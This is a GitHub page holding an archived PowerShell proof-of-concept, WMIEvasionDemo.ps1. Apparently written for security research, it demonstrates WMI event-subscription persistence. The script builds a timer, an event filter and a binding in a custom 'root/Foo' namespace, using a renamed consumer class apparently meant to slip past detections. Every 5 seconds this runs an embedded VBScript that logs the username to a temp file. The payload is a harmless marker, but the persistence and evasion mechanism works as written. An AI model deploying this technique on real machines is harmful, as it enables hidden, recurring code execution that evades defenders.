This repository has been archived by the owner on Sep 13, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathWMIEvasionDemo.ps1
56 lines (38 loc) · 1.6 KB
/
WMIEvasionDemo.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$TargetNamespace = 'root/Foo'
$VBScriptPayload = @"
Option Explicit
Dim strUser, strFileTargetPath, objFSOTarget, fso, objFilesTarget
strUser = CreateObject("WScript.Network").UserName
strFileTargetPath = "C:\Windows\Temp\wmifiledrop.txt"
Set objFSOTarget = CreateObject("scripting.filesystemobject")
Set objFilesTarget = objFSOTarget.OpenTextFile(strFileTargetPath,8,True,0)
Set fso = CreateObject("Scripting.FileSystemObject")
objFilesTarget.WriteLine "Payload executed as " & strUser & " at: " & now
objFilesTarget.Close
"@
$TimerArgs = @{
IntervalBetweenEvents = ([UInt32] 5000) # Trigger every 5 seconds
SkipIfPassed = $False
TimerId = 'PayloadTrigger'
}
$Timer = New-CimInstance -Namespace $TargetNamespace -Class __IntervalTimerInstruction -Arguments $TimerArgs
$EventFilterArgs = @{
EventNamespace = $TargetNamespace
Name = 'TimerTrigger'
Query = 'SELECT * FROM __TimerEvent WHERE TimerID = "PayloadTrigger"'
QueryLanguage = 'WQL'
}
$Filter = New-CimInstance -Namespace $TargetNamespace -ClassName __EventFilter -Property $EventFilterArgs
$ActiveScriptEventConsumerArgs = @{
Name = 'ExecuteFileDropper'
ScriptingEngine = 'VBScript'
ScriptText = $VBScriptPayload
KillTimeout = [UInt32] 45
}
$Consumer = New-CimInstance -Namespace $TargetNamespace -ClassName NotAnActiveScriptEventConsumer -Property $ActiveScriptEventConsumerArgs
$Consumer
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter
Consumer = [Ref] $Consumer
}
$FilterToConsumerBinding = New-CimInstance -Namespace $TargetNamespace -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs